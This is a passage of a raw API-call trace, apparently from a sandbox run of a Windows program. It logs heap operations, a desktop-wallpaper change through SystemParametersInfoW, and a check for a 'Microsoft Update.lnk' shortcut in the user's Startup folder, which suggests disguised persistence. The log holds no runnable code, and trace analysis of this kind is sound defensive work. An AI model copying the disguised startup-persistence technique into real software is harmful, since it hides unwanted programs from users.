lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0239.189] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0239.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f80 [0239.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0239.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0239.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0239.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0239.190] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0239.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0239.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0239.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0239.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0239.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0239.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0239.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0239.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0239.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0239.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0239.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0239.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0239.191] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0239.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0239.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0239.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0239.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0239.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0239.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0239.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0239.302] FreeLibrary (hLibModule=0x76240000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0239.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0239.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0239.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0239.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0239.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0239.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0239.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0239.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0239.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0239.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0239.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0239.305] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0239.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0239.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0239.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0239.306] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0239.306] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0239.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0239.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0239.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0239.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0239.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0239.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.307] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0239.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0239.308] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0239.308] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.308] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0239.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 